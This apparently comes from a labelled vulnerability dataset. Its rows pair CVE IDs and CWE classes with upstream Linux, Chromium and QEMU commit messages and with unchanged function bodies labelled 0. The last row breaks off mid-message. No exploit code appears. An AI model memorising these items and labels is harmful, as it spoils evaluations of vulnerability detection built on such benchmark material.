CVE-2011-1019 | https://www.cvedetails.com/cve/CVE-2011-1019/ | CWE-264 | https://github.com/torvalds/linux/commit/8909c9ad8ff03611c9c96c9a92656213e4bb495b | 8909c9ad8ff03611c9c96c9a92656213e4bb495b | net: don't allow CAP_NET_ADMIN to load non-netdev kernel modules
Since a8f80e8ff94ecba629542d9b4b5f5a8ee3eb565c any process with
CAP_NET_ADMIN may load any module from /lib/modules/. This doesn't mean
that CAP_NET_ADMIN is a superset of CAP_SYS_MODULE as modules are
limited to /lib/modules/**. However, CAP_NET_ADMIN capability shouldn't
allow anybody load any module not related to networking.
This patch restricts an ability of autoloading modules to netdev modules
with explicit aliases. This fixes CVE-2011-1019.
Arnd Bergmann suggested to leave untouched the old pre-v2.6.32 behavior
of loading netdev modules by name (without any prefix) for processes
with CAP_SYS_MODULE to maintain the compatibility with network scripts
that use autoloading netdev modules by aliases like "eth0", "wlan0".
Currently there are only three users of the feature in the upstream
kernel: ipip, ip_gre and sit.
root@albatros:~# capsh --drop=$(seq -s, 0 11),$(seq -s, 13 34) --
root@albatros:~# grep Cap /proc/$$/status
CapInh: 0000000000000000
CapPrm: fffffff800001000
CapEff: fffffff800001000
CapBnd: fffffff800001000
root@albatros:~# modprobe xfs
FATAL: Error inserting xfs
(/lib/modules/2.6.38-rc6-00001-g2bf4ca3/kernel/fs/xfs/xfs.ko): Operation not permitted
root@albatros:~# lsmod | grep xfs
root@albatros:~# ifconfig xfs
xfs: error fetching interface information: Device not found
root@albatros:~# lsmod | grep xfs
root@albatros:~# lsmod | grep sit
root@albatros:~# ifconfig sit
sit: error fetching interface information: Device not found
root@albatros:~# lsmod | grep sit
root@albatros:~# ifconfig sit0
sit0 Link encap:IPv6-in-IPv4
NOARP MTU:1480 Metric:1
root@albatros:~# lsmod | grep sit
sit 10457 0
tunnel4 2957 1 sit
For CAP_SYS_MODULE module loading is still relaxed:
root@albatros:~# grep Cap /proc/$$/status
CapInh: 0000000000000000
CapPrm: ffffffffffffffff
CapEff: ffffffffffffffff
CapBnd: ffffffffffffffff
root@albatros:~# ifconfig xfs
xfs: error fetching interface information: Device not found
root@albatros:~# lsmod | grep xfs
xfs 745319 0
Reference: https://lkml.org/lkml/2011/2/24/203
Signed-off-by: Vasiliy Kulikov <segoon@openwall.com>
Signed-off-by: Michael Tokarev <mjt@tls.msk.ru>
Acked-by: David S. Miller <davem@davemloft.net>
Acked-by: Kees Cook <kees.cook@canonical.com>
Signed-off-by: James Morris <jmorris@namei.org> | void __dev_remove_pack(struct packet_type *pt)
{
struct list_head *head = ptype_head(pt);
struct packet_type *pt1;
spin_lock(&ptype_lock);
list_for_each_entry(pt1, head, list) {
if (pt == pt1) {
list_del_rcu(&pt->list);
goto out;
}
}
printk(KERN_WARNING "dev_remove_pack: %p not found.\n", pt);
out:
spin_unlock(&ptype_lock);
}
| void __dev_remove_pack(struct packet_type *pt)
{
struct list_head *head = ptype_head(pt);
struct packet_type *pt1;
spin_lock(&ptype_lock);
list_for_each_entry(pt1, head, list) {
if (pt == pt1) {
list_del_rcu(&pt->list);
goto out;
}
}
printk(KERN_WARNING "dev_remove_pack: %p not found.\n", pt);
out:
spin_unlock(&ptype_lock);
}
| C | linux | 0 |
CVE-2018-6033 | https://www.cvedetails.com/cve/CVE-2018-6033/ | CWE-20 | https://github.com/chromium/chromium/commit/a8d6ae61d266d8bc44c3dd2d08bda32db701e359 | a8d6ae61d266d8bc44c3dd2d08bda32db701e359 | Downloads : Fixed an issue of opening incorrect download file
When one download overwrites another completed download, calling download.open in the old download causes the new download to open, which could be dangerous and undesirable. In this CL, we are trying to avoid this by blocking the opening of the old download.
Bug: 793620
Change-Id: Ic948175756700ad7c08489c3cc347330daedb6f8
Reviewed-on: https://chromium-review.googlesource.com/826477
Reviewed-by: David Trainor <dtrainor@chromium.org>
Reviewed-by: Xing Liu <xingliu@chromium.org>
Reviewed-by: John Abd-El-Malek <jam@chromium.org>
Commit-Queue: Shakti Sahu <shaktisahu@chromium.org>
Cr-Commit-Position: refs/heads/master@{#525810} | void DownloadItemImpl::Start(
std::unique_ptr<DownloadFile> file,
std::unique_ptr<DownloadRequestHandleInterface> req_handle,
const DownloadCreateInfo& new_create_info) {
DCHECK_CURRENTLY_ON(BrowserThread::UI);
DCHECK(!download_file_.get());
DVLOG(20) << __func__ << "() this=" << DebugString(true);
RecordDownloadCount(START_COUNT);
download_file_ = std::move(file);
job_ = DownloadJobFactory::CreateJob(this, std::move(req_handle),
new_create_info, false);
if (job_->IsParallelizable()) {
RecordParallelizableDownloadCount(START_COUNT, IsParallelDownloadEnabled());
}
deferred_interrupt_reason_ = DOWNLOAD_INTERRUPT_REASON_NONE;
if (state_ == CANCELLED_INTERNAL) {
ReleaseDownloadFile(true);
job_->Cancel(true);
return;
}
DCHECK(state_ == INITIAL_INTERNAL || state_ == RESUMING_INTERNAL);
DCHECK(state_ != INITIAL_INTERNAL || GetTargetFilePath().empty());
if (new_create_info.result != DOWNLOAD_INTERRUPT_REASON_NONE) {
DCHECK(!download_file_.get());
DCHECK(new_create_info.save_info);
int64_t offset = new_create_info.save_info->offset;
std::unique_ptr<crypto::SecureHash> hash_state =
new_create_info.save_info->hash_state
? new_create_info.save_info->hash_state->Clone()
: nullptr;
destination_info_.received_bytes = offset;
hash_state_ = std::move(hash_state);
destination_info_.hash.clear();
deferred_interrupt_reason_ = new_create_info.result;
received_slices_.clear();
TransitionTo(INTERRUPTED_TARGET_PENDING_INTERNAL);
DetermineDownloadTarget();
return;
}
if (state_ == INITIAL_INTERNAL) {
RecordDownloadCount(NEW_DOWNLOAD_COUNT);
if (job_->IsParallelizable()) {
RecordParallelizableDownloadCount(NEW_DOWNLOAD_COUNT,
IsParallelDownloadEnabled());
}
RecordDownloadMimeType(mime_type_);
if (!GetBrowserContext()->IsOffTheRecord()) {
RecordDownloadCount(NEW_DOWNLOAD_COUNT_NORMAL_PROFILE);
RecordDownloadMimeTypeForNormalProfile(mime_type_);
}
}
DCHECK(download_file_);
DCHECK(job_);
if (state_ == RESUMING_INTERNAL)
UpdateValidatorsOnResumption(new_create_info);
if (!job_->IsParallelizable() && !received_slices_.empty()) {
destination_info_.received_bytes =
GetMaxContiguousDataBlockSizeFromBeginning(received_slices_);
received_slices_.clear();
}
TransitionTo(TARGET_PENDING_INTERNAL);
job_->Start(download_file_.get(),
base::Bind(&DownloadItemImpl::OnDownloadFileInitialized,
weak_ptr_factory_.GetWeakPtr()),
GetReceivedSlices());
}
| void DownloadItemImpl::Start(
std::unique_ptr<DownloadFile> file,
std::unique_ptr<DownloadRequestHandleInterface> req_handle,
const DownloadCreateInfo& new_create_info) {
DCHECK_CURRENTLY_ON(BrowserThread::UI);
DCHECK(!download_file_.get());
DVLOG(20) << __func__ << "() this=" << DebugString(true);
RecordDownloadCount(START_COUNT);
download_file_ = std::move(file);
job_ = DownloadJobFactory::CreateJob(this, std::move(req_handle),
new_create_info, false);
if (job_->IsParallelizable()) {
RecordParallelizableDownloadCount(START_COUNT, IsParallelDownloadEnabled());
}
deferred_interrupt_reason_ = DOWNLOAD_INTERRUPT_REASON_NONE;
if (state_ == CANCELLED_INTERNAL) {
ReleaseDownloadFile(true);
job_->Cancel(true);
return;
}
DCHECK(state_ == INITIAL_INTERNAL || state_ == RESUMING_INTERNAL);
DCHECK(state_ != INITIAL_INTERNAL || GetTargetFilePath().empty());
if (new_create_info.result != DOWNLOAD_INTERRUPT_REASON_NONE) {
DCHECK(!download_file_.get());
DCHECK(new_create_info.save_info);
int64_t offset = new_create_info.save_info->offset;
std::unique_ptr<crypto::SecureHash> hash_state =
new_create_info.save_info->hash_state
? new_create_info.save_info->hash_state->Clone()
: nullptr;
destination_info_.received_bytes = offset;
hash_state_ = std::move(hash_state);
destination_info_.hash.clear();
deferred_interrupt_reason_ = new_create_info.result;
received_slices_.clear();
TransitionTo(INTERRUPTED_TARGET_PENDING_INTERNAL);
DetermineDownloadTarget();
return;
}
if (state_ == INITIAL_INTERNAL) {
RecordDownloadCount(NEW_DOWNLOAD_COUNT);
if (job_->IsParallelizable()) {
RecordParallelizableDownloadCount(NEW_DOWNLOAD_COUNT,
IsParallelDownloadEnabled());
}
RecordDownloadMimeType(mime_type_);
if (!GetBrowserContext()->IsOffTheRecord()) {
RecordDownloadCount(NEW_DOWNLOAD_COUNT_NORMAL_PROFILE);
RecordDownloadMimeTypeForNormalProfile(mime_type_);
}
}
DCHECK(download_file_);
DCHECK(job_);
if (state_ == RESUMING_INTERNAL)
UpdateValidatorsOnResumption(new_create_info);
if (!job_->IsParallelizable() && !received_slices_.empty()) {
destination_info_.received_bytes =
GetMaxContiguousDataBlockSizeFromBeginning(received_slices_);
received_slices_.clear();
}
TransitionTo(TARGET_PENDING_INTERNAL);
job_->Start(download_file_.get(),
base::Bind(&DownloadItemImpl::OnDownloadFileInitialized,
weak_ptr_factory_.GetWeakPtr()),
GetReceivedSlices());
}
| C | Chrome | 0 |
CVE-2018-16073 | https://www.cvedetails.com/cve/CVE-2018-16073/ | CWE-285 | https://github.com/chromium/chromium/commit/0bb3f5c715eb66bb5c1fb05fd81d902ca57f33ca | 0bb3f5c715eb66bb5c1fb05fd81d902ca57f33ca | Use unique processes for data URLs on restore.
Data URLs are usually put into the process that created them, but this
info is not tracked after a tab restore. Ensure that they do not end up
in the parent frame's process (or each other's process), in case they
are malicious.
BUG=863069
Change-Id: Ib391f90c7bdf28a0a9c057c5cc7918c10aed968b
Reviewed-on: https://chromium-review.googlesource.com/1150767
Reviewed-by: Alex Moshchuk <alexmos@chromium.org>
Reviewed-by: Lei Zhang <thestig@chromium.org>
Commit-Queue: Charlie Reis <creis@chromium.org>
Cr-Commit-Position: refs/heads/master@{#581023} | bool RenderFrameHostManager::ReinitializeRenderFrame(
RenderFrameHostImpl* render_frame_host) {
DCHECK(!render_frame_host->IsRenderFrameLive());
CreateOpenerProxies(render_frame_host->GetSiteInstance(), frame_tree_node_);
if (!frame_tree_node_->parent()) {
DCHECK(!GetRenderFrameProxyHost(render_frame_host->GetSiteInstance()));
if (!InitRenderView(render_frame_host->render_view_host(), nullptr))
return false;
} else {
if (!InitRenderFrame(render_frame_host))
return false;
RenderFrameProxyHost* proxy_to_parent = GetProxyToParent();
if (proxy_to_parent) {
const gfx::Size* size = render_frame_host->frame_size()
? &*render_frame_host->frame_size()
: nullptr;
GetProxyToParent()->SetChildRWHView(render_frame_host->GetView(), size);
}
}
DCHECK(render_frame_host->IsRenderFrameLive());
return true;
}
| bool RenderFrameHostManager::ReinitializeRenderFrame(
RenderFrameHostImpl* render_frame_host) {
DCHECK(!render_frame_host->IsRenderFrameLive());
CreateOpenerProxies(render_frame_host->GetSiteInstance(), frame_tree_node_);
if (!frame_tree_node_->parent()) {
DCHECK(!GetRenderFrameProxyHost(render_frame_host->GetSiteInstance()));
if (!InitRenderView(render_frame_host->render_view_host(), nullptr))
return false;
} else {
if (!InitRenderFrame(render_frame_host))
return false;
RenderFrameProxyHost* proxy_to_parent = GetProxyToParent();
if (proxy_to_parent) {
const gfx::Size* size = render_frame_host->frame_size()
? &*render_frame_host->frame_size()
: nullptr;
GetProxyToParent()->SetChildRWHView(render_frame_host->GetView(), size);
}
}
DCHECK(render_frame_host->IsRenderFrameLive());
return true;
}
| C | Chrome | 0 |
CVE-2012-2880 | https://www.cvedetails.com/cve/CVE-2012-2880/ | CWE-362 | https://github.com/chromium/chromium/commit/fcd3a7a671ecf2d5f46ea34787d27507a914d2f5 | fcd3a7a671ecf2d5f46ea34787d27507a914d2f5 | [Sync] Cleanup all tab sync enabling logic now that its on by default.
BUG=none
TEST=
Review URL: https://chromiumcodereview.appspot.com/10443046
git-svn-id: svn://svn.chromium.org/chrome/trunk/src@139462 0039d316-1c4b-4281-b951-d872f2087c98 | void SyncTest::SetProxyConfig(net::URLRequestContextGetter* context_getter,
const net::ProxyConfig& proxy_config) {
base::WaitableEvent done(false, false);
BrowserThread::PostTask(
BrowserThread::IO, FROM_HERE,
base::Bind(&SetProxyConfigCallback, &done,
make_scoped_refptr(context_getter), proxy_config));
done.Wait();
}
| void SyncTest::SetProxyConfig(net::URLRequestContextGetter* context_getter,
const net::ProxyConfig& proxy_config) {
base::WaitableEvent done(false, false);
BrowserThread::PostTask(
BrowserThread::IO, FROM_HERE,
base::Bind(&SetProxyConfigCallback, &done,
make_scoped_refptr(context_getter), proxy_config));
done.Wait();
}
| C | Chrome | 0 |
CVE-2016-5194 | null | null | https://github.com/chromium/chromium/commit/d4e0a7273cd8d7a9ee667ad5b5c8aad0f5f59251 | d4e0a7273cd8d7a9ee667ad5b5c8aad0f5f59251 | Clear Shill stub config in offline file manager tests
The Shill stub client fakes ethernet and wifi connections during
testing. Clear its config during offline tests to simulate a lack of
network connectivity.
As a side effect, fileManagerPrivate.getDriveConnectionState will no
longer need to be stubbed out, as it will now think the device is
offline and return the appropriate result.
Bug: 925272
Change-Id: Idd6cb44325cfde4991d3b1e64185a28e8655c733
Reviewed-on: https://chromium-review.googlesource.com/c/chromium/src/+/1578149
Commit-Queue: Austin Tankiang <austinct@chromium.org>
Reviewed-by: Sam McNally <sammc@chromium.org>
Cr-Commit-Position: refs/heads/master@{#654782} | RemovableTestVolume(const std::string& name,
VolumeType volume_type,
chromeos::DeviceType device_type,
const base::FilePath& device_path,
const std::string& drive_label)
: LocalTestVolume(name),
volume_type_(volume_type),
device_type_(device_type),
device_path_(device_path),
drive_label_(drive_label) {}
| RemovableTestVolume(const std::string& name,
VolumeType volume_type,
chromeos::DeviceType device_type,
const base::FilePath& device_path,
const std::string& drive_label)
: LocalTestVolume(name),
volume_type_(volume_type),
device_type_(device_type),
device_path_(device_path),
drive_label_(drive_label) {}
| C | Chrome | 0 |
CVE-2016-1667 | https://www.cvedetails.com/cve/CVE-2016-1667/ | CWE-284 | https://github.com/chromium/chromium/commit/350f7d4b2c76950c8e7271284de84a9756b796e1 | 350f7d4b2c76950c8e7271284de84a9756b796e1 | P2PQuicStream write functionality.
This adds the P2PQuicStream::WriteData function and adds tests. It also
adds the concept of a write buffered amount, enforcing this at the
P2PQuicStreamImpl.
Bug: 874296
Change-Id: Id02c8aa8d5368a87bb24a2e50dab5ef94bcae131
Reviewed-on: https://chromium-review.googlesource.com/c/1315534
Commit-Queue: Seth Hampson <shampson@chromium.org>
Reviewed-by: Henrik Boström <hbos@chromium.org>
Cr-Commit-Position: refs/heads/master@{#605766} | void DisconnectPeerTransport(FakePacketTransport* peer_packet_transport) {
DCHECK(peer_packet_transport_ == peer_packet_transport);
peer_packet_transport_ = nullptr;
}
| void DisconnectPeerTransport(FakePacketTransport* peer_packet_transport) {
DCHECK(peer_packet_transport_ == peer_packet_transport);
peer_packet_transport_ = nullptr;
}
| C | Chrome | 0 |
null | null | null | https://github.com/chromium/chromium/commit/87c15175997b0103166020d79fe9048dcf4025f4 | 87c15175997b0103166020d79fe9048dcf4025f4 | Add support for horizontal mouse wheel messages in Windows Desktop Aura.
This is simply a matter of recognizing the WM_MOUSEHWHEEL message as a valid mouse wheel message.
Tested this on web pages with horizontal scrollbars and it works well.
BUG=332797
R=sky@chromium.org, sky
Review URL: https://codereview.chromium.org/140653006
git-svn-id: svn://svn.chromium.org/chrome/trunk/src@245651 0039d316-1c4b-4281-b951-d872f2087c98 | bool IsKeyEvent(const base::NativeEvent& native_event) {
return native_event.message == WM_KEYDOWN ||
native_event.message == WM_SYSKEYDOWN ||
native_event.message == WM_CHAR ||
native_event.message == WM_KEYUP ||
native_event.message == WM_SYSKEYUP;
}
| bool IsKeyEvent(const base::NativeEvent& native_event) {
return native_event.message == WM_KEYDOWN ||
native_event.message == WM_SYSKEYDOWN ||
native_event.message == WM_CHAR ||
native_event.message == WM_KEYUP ||
native_event.message == WM_SYSKEYUP;
}
| C | Chrome | 0 |
CVE-2017-5061 | https://www.cvedetails.com/cve/CVE-2017-5061/ | CWE-362 | https://github.com/chromium/chromium/commit/5d78b84d39bd34bc9fce9d01c0dcd5a22a330d34 | 5d78b84d39bd34bc9fce9d01c0dcd5a22a330d34 | (Reland) Discard compositor frames from unloaded web content
This is a reland of https://codereview.chromium.org/2707243005/ with a
small change to fix an uninitialized memory error that fails on MSAN
bots.
BUG=672847
TBR=danakj@chromium.org, creis@chromium.org
CQ_INCLUDE_TRYBOTS=master.tryserver.blink:linux_trusty_blink_rel;master.tryserver.chromium.linux:linux_site_isolation
Review-Url: https://codereview.chromium.org/2731283003
Cr-Commit-Position: refs/heads/master@{#454954} | void LayerTreeHost::SetNextCommitForcesRedraw() {
next_commit_forces_redraw_ = true;
proxy_->SetNeedsUpdateLayers();
}
| void LayerTreeHost::SetNextCommitForcesRedraw() {
next_commit_forces_redraw_ = true;
proxy_->SetNeedsUpdateLayers();
}
| C | Chrome | 0 |
CVE-2017-5009 | https://www.cvedetails.com/cve/CVE-2017-5009/ | CWE-119 | https://github.com/chromium/chromium/commit/1c40f9042ae2d6ee7483d72998aabb5e73b2ff60 | 1c40f9042ae2d6ee7483d72998aabb5e73b2ff60 | DevTools: send proper resource type in Network.RequestWillBeSent
This patch plumbs resoure type into the DispatchWillSendRequest
instrumenation. This allows us to report accurate type in
Network.RequestWillBeSent event, instead of "Other", that we report
today.
BUG=765501
R=dgozman
Change-Id: I0134c08b841e8dd247fdc8ff208bfd51e462709c
Reviewed-on: https://chromium-review.googlesource.com/667504
Reviewed-by: Pavel Feldman <pfeldman@chromium.org>
Reviewed-by: Dmitry Gozman <dgozman@chromium.org>
Commit-Queue: Andrey Lushnikov <lushnikov@chromium.org>
Cr-Commit-Position: refs/heads/master@{#507936} | void InspectorPageAgent::DidClearDocumentOfWindowObject(LocalFrame* frame) {
if (!GetFrontend())
return;
protocol::DictionaryValue* scripts =
state_->getObject(PageAgentState::kPageAgentScriptsToEvaluateOnLoad);
if (scripts) {
for (size_t i = 0; i < scripts->size(); ++i) {
auto script = scripts->at(i);
String script_text;
if (script.second->asString(&script_text))
frame->GetScriptController().ExecuteScriptInMainWorld(script_text);
}
}
if (!script_to_evaluate_on_load_once_.IsEmpty()) {
frame->GetScriptController().ExecuteScriptInMainWorld(
script_to_evaluate_on_load_once_);
}
}
| void InspectorPageAgent::DidClearDocumentOfWindowObject(LocalFrame* frame) {
if (!GetFrontend())
return;
protocol::DictionaryValue* scripts =
state_->getObject(PageAgentState::kPageAgentScriptsToEvaluateOnLoad);
if (scripts) {
for (size_t i = 0; i < scripts->size(); ++i) {
auto script = scripts->at(i);
String script_text;
if (script.second->asString(&script_text))
frame->GetScriptController().ExecuteScriptInMainWorld(script_text);
}
}
if (!script_to_evaluate_on_load_once_.IsEmpty()) {
frame->GetScriptController().ExecuteScriptInMainWorld(
script_to_evaluate_on_load_once_);
}
}
| C | Chrome | 0 |
CVE-2012-2875 | https://www.cvedetails.com/cve/CVE-2012-2875/ | null | https://github.com/chromium/chromium/commit/1266ba494530a267ec8a21442ea1b5cae94da4fb | 1266ba494530a267ec8a21442ea1b5cae94da4fb | Introduce XGetImage() for GrabWindowSnapshot() in ChromeOS.
BUG=119492
TEST=manually done
Review URL: https://chromiumcodereview.appspot.com/10386124
git-svn-id: svn://svn.chromium.org/chrome/trunk/src@137556 0039d316-1c4b-4281-b951-d872f2087c98 | void RootWindowHostWin::ToggleFullScreen() {
gfx::Rect target_rect;
if (!fullscreen_) {
fullscreen_ = true;
saved_window_style_ = GetWindowLong(hwnd(), GWL_STYLE);
saved_window_ex_style_ = GetWindowLong(hwnd(), GWL_EXSTYLE);
GetWindowRect(hwnd(), &saved_window_rect_);
SetWindowLong(hwnd(), GWL_STYLE,
saved_window_style_ & ~(WS_CAPTION | WS_THICKFRAME));
SetWindowLong(hwnd(), GWL_EXSTYLE,
saved_window_ex_style_ & ~(WS_EX_DLGMODALFRAME |
WS_EX_WINDOWEDGE | WS_EX_CLIENTEDGE | WS_EX_STATICEDGE));
MONITORINFO mi;
mi.cbSize = sizeof(mi);
GetMonitorInfo(MonitorFromWindow(hwnd(), MONITOR_DEFAULTTONEAREST), &mi);
target_rect = mi.rcMonitor;
} else {
fullscreen_ = false;
SetWindowLong(hwnd(), GWL_STYLE, saved_window_style_);
SetWindowLong(hwnd(), GWL_EXSTYLE, saved_window_ex_style_);
target_rect = saved_window_rect_;
}
SetWindowPos(hwnd(),
NULL,
target_rect.x(),
target_rect.y(),
target_rect.width(),
target_rect.height(),
SWP_NOZORDER | SWP_NOACTIVATE | SWP_FRAMECHANGED);
}
| void RootWindowHostWin::ToggleFullScreen() {
gfx::Rect target_rect;
if (!fullscreen_) {
fullscreen_ = true;
saved_window_style_ = GetWindowLong(hwnd(), GWL_STYLE);
saved_window_ex_style_ = GetWindowLong(hwnd(), GWL_EXSTYLE);
GetWindowRect(hwnd(), &saved_window_rect_);
SetWindowLong(hwnd(), GWL_STYLE,
saved_window_style_ & ~(WS_CAPTION | WS_THICKFRAME));
SetWindowLong(hwnd(), GWL_EXSTYLE,
saved_window_ex_style_ & ~(WS_EX_DLGMODALFRAME |
WS_EX_WINDOWEDGE | WS_EX_CLIENTEDGE | WS_EX_STATICEDGE));
MONITORINFO mi;
mi.cbSize = sizeof(mi);
GetMonitorInfo(MonitorFromWindow(hwnd(), MONITOR_DEFAULTTONEAREST), &mi);
target_rect = mi.rcMonitor;
} else {
fullscreen_ = false;
SetWindowLong(hwnd(), GWL_STYLE, saved_window_style_);
SetWindowLong(hwnd(), GWL_EXSTYLE, saved_window_ex_style_);
target_rect = saved_window_rect_;
}
SetWindowPos(hwnd(),
NULL,
target_rect.x(),
target_rect.y(),
target_rect.width(),
target_rect.height(),
SWP_NOZORDER | SWP_NOACTIVATE | SWP_FRAMECHANGED);
}
| C | Chrome | 0 |
CVE-2016-4964 | https://www.cvedetails.com/cve/CVE-2016-4964/ | CWE-20 | https://git.qemu.org/?p=qemu.git;a=commit;h=06630554ccbdd25780aa03c3548aaff1eb56dffd | 06630554ccbdd25780aa03c3548aaff1eb56dffd | null | static int mptsas_process_scsi_io_request(MPTSASState *s,
MPIMsgSCSIIORequest *scsi_io,
hwaddr addr)
{
MPTSASRequest *req;
MPIMsgSCSIIOReply reply;
SCSIDevice *sdev;
int status;
mptsas_fix_scsi_io_endianness(scsi_io);
trace_mptsas_process_scsi_io_request(s, scsi_io->Bus, scsi_io->TargetID,
scsi_io->LUN[1], scsi_io->DataLength);
status = mptsas_scsi_device_find(s, scsi_io->Bus, scsi_io->TargetID,
scsi_io->LUN, &sdev);
if (status) {
goto bad;
}
req = g_new(MPTSASRequest, 1);
QTAILQ_INSERT_TAIL(&s->pending, req, next);
req->scsi_io = *scsi_io;
req->dev = s;
status = mptsas_build_sgl(s, req, addr);
if (status) {
goto free_bad;
}
if (req->qsg.size < scsi_io->DataLength) {
trace_mptsas_sgl_overflow(s, scsi_io->MsgContext, scsi_io->DataLength,
req->qsg.size);
status = MPI_IOCSTATUS_INVALID_SGL;
goto free_bad;
}
req->sreq = scsi_req_new(sdev, scsi_io->MsgContext,
scsi_io->LUN[1], scsi_io->CDB, req);
if (req->sreq->cmd.xfer > scsi_io->DataLength) {
goto overrun;
}
switch (scsi_io->Control & MPI_SCSIIO_CONTROL_DATADIRECTION_MASK) {
case MPI_SCSIIO_CONTROL_NODATATRANSFER:
if (req->sreq->cmd.mode != SCSI_XFER_NONE) {
goto overrun;
}
break;
case MPI_SCSIIO_CONTROL_WRITE:
if (req->sreq->cmd.mode != SCSI_XFER_TO_DEV) {
goto overrun;
}
break;
case MPI_SCSIIO_CONTROL_READ:
if (req->sreq->cmd.mode != SCSI_XFER_FROM_DEV) {
goto overrun;
}
break;
}
if (scsi_req_enqueue(req->sreq)) {
scsi_req_continue(req->sreq);
}
return 0;
overrun:
trace_mptsas_scsi_overflow(s, scsi_io->MsgContext, req->sreq->cmd.xfer,
scsi_io->DataLength);
status = MPI_IOCSTATUS_SCSI_DATA_OVERRUN;
free_bad:
mptsas_free_request(req);
bad:
memset(&reply, 0, sizeof(reply));
reply.TargetID = scsi_io->TargetID;
reply.Bus = scsi_io->Bus;
reply.MsgLength = sizeof(reply) / 4;
reply.Function = scsi_io->Function;
reply.CDBLength = scsi_io->CDBLength;
reply.SenseBufferLength = scsi_io->SenseBufferLength;
reply.MsgContext = scsi_io->MsgContext;
reply.SCSIState = MPI_SCSI_STATE_NO_SCSI_STATUS;
reply.IOCStatus = status;
mptsas_fix_scsi_io_reply_endianness(&reply);
mptsas_reply(s, (MPIDefaultReply *)&reply);
return 0;
}
| static int mptsas_process_scsi_io_request(MPTSASState *s,
MPIMsgSCSIIORequest *scsi_io,
hwaddr addr)
{
MPTSASRequest *req;
MPIMsgSCSIIOReply reply;
SCSIDevice *sdev;
int status;
mptsas_fix_scsi_io_endianness(scsi_io);
trace_mptsas_process_scsi_io_request(s, scsi_io->Bus, scsi_io->TargetID,
scsi_io->LUN[1], scsi_io->DataLength);
status = mptsas_scsi_device_find(s, scsi_io->Bus, scsi_io->TargetID,
scsi_io->LUN, &sdev);
if (status) {
goto bad;
}
req = g_new(MPTSASRequest, 1);
QTAILQ_INSERT_TAIL(&s->pending, req, next);
req->scsi_io = *scsi_io;
req->dev = s;
status = mptsas_build_sgl(s, req, addr);
if (status) {
goto free_bad;
}
if (req->qsg.size < scsi_io->DataLength) {
trace_mptsas_sgl_overflow(s, scsi_io->MsgContext, scsi_io->DataLength,
req->qsg.size);
status = MPI_IOCSTATUS_INVALID_SGL;
goto free_bad;
}
req->sreq = scsi_req_new(sdev, scsi_io->MsgContext,
scsi_io->LUN[1], scsi_io->CDB, req);
if (req->sreq->cmd.xfer > scsi_io->DataLength) {
goto overrun;
}
switch (scsi_io->Control & MPI_SCSIIO_CONTROL_DATADIRECTION_MASK) {
case MPI_SCSIIO_CONTROL_NODATATRANSFER:
if (req->sreq->cmd.mode != SCSI_XFER_NONE) {
goto overrun;
}
break;
case MPI_SCSIIO_CONTROL_WRITE:
if (req->sreq->cmd.mode != SCSI_XFER_TO_DEV) {
goto overrun;
}
break;
case MPI_SCSIIO_CONTROL_READ:
if (req->sreq->cmd.mode != SCSI_XFER_FROM_DEV) {
goto overrun;
}
break;
}
if (scsi_req_enqueue(req->sreq)) {
scsi_req_continue(req->sreq);
}
return 0;
overrun:
trace_mptsas_scsi_overflow(s, scsi_io->MsgContext, req->sreq->cmd.xfer,
scsi_io->DataLength);
status = MPI_IOCSTATUS_SCSI_DATA_OVERRUN;
free_bad:
mptsas_free_request(req);
bad:
memset(&reply, 0, sizeof(reply));
reply.TargetID = scsi_io->TargetID;
reply.Bus = scsi_io->Bus;
reply.MsgLength = sizeof(reply) / 4;
reply.Function = scsi_io->Function;
reply.CDBLength = scsi_io->CDBLength;
reply.SenseBufferLength = scsi_io->SenseBufferLength;
reply.MsgContext = scsi_io->MsgContext;
reply.SCSIState = MPI_SCSI_STATE_NO_SCSI_STATUS;
reply.IOCStatus = status;
mptsas_fix_scsi_io_reply_endianness(&reply);
mptsas_reply(s, (MPIDefaultReply *)&reply);
return 0;
}
| C | qemu | 0 |
CVE-2018-6121 | https://www.cvedetails.com/cve/CVE-2018-6121/ | CWE-20 | https://github.com/chromium/chromium/commit/7614790c80996d32a28218f4d1605b0908e9ddf6 | 7614790c80996d32a28218f4d1605b0908e9ddf6 | Apply ExtensionNavigationThrottle filesystem/blob checks to all frames.
BUG=836858
Change-Id: I34333a72501129fd40b5a9aa6378c9f35f1e7fc2
Reviewed-on: https://chromium-review.googlesource.com/1028511
Reviewed-by: Devlin <rdevlin.cronin@chromium.org>
Reviewed-by: Alex Moshchuk <alexmos@chromium.org>
Reviewed-by: Nick Carter <nick@chromium.org>
Commit-Queue: Charlie Reis <creis@chromium.org>
Cr-Commit-Position: refs/heads/master@{#553867} | TitleWatcher::TitleWatcher(WebContents* web_contents,
const base::string16& expected_title)
: WebContentsObserver(web_contents) {
expected_titles_.push_back(expected_title);
}
| TitleWatcher::TitleWatcher(WebContents* web_contents,
const base::string16& expected_title)
: WebContentsObserver(web_contents) {
expected_titles_.push_back(expected_title);
}
| C | Chrome | 0 |
CVE-2013-0882 | https://www.cvedetails.com/cve/CVE-2013-0882/ | CWE-119 | https://github.com/chromium/chromium/commit/25f9415f43d607d3d01f542f067e3cc471983e6b | 25f9415f43d607d3d01f542f067e3cc471983e6b | Add HTMLFormControlElement::supportsAutofocus to fix a FIXME comment.
This virtual function should return true if the form control can hanlde
'autofocucs' attribute if it is specified.
Note: HTMLInputElement::supportsAutofocus reuses InputType::isInteractiveContent
because interactiveness is required for autofocus capability.
BUG=none
TEST=none; no behavior changes.
Review URL: https://codereview.chromium.org/143343003
git-svn-id: svn://svn.chromium.org/blink/trunk@165432 bbb929c8-8fbe-4397-9dbb-9b2b20218538 | PassRefPtr<HTMLTextAreaElement> HTMLTextAreaElement::create(Document& document, HTMLFormElement* form)
{
RefPtr<HTMLTextAreaElement> textArea = adoptRef(new HTMLTextAreaElement(document, form));
textArea->ensureUserAgentShadowRoot();
return textArea.release();
}
| PassRefPtr<HTMLTextAreaElement> HTMLTextAreaElement::create(Document& document, HTMLFormElement* form)
{
RefPtr<HTMLTextAreaElement> textArea = adoptRef(new HTMLTextAreaElement(document, form));
textArea->ensureUserAgentShadowRoot();
return textArea.release();
}
| C | Chrome | 0 |
CVE-2017-7533 | https://www.cvedetails.com/cve/CVE-2017-7533/ | CWE-362 | https://github.com/torvalds/linux/commit/49d31c2f389acfe83417083e1208422b4091cd9e | 49d31c2f389acfe83417083e1208422b4091cd9e | dentry name snapshots
take_dentry_name_snapshot() takes a safe snapshot of dentry name;
if the name is a short one, it gets copied into caller-supplied
structure, otherwise an extra reference to external name is grabbed
(those are never modified). In either case the pointer to stable
string is stored into the same structure.
dentry must be held by the caller of take_dentry_name_snapshot(),
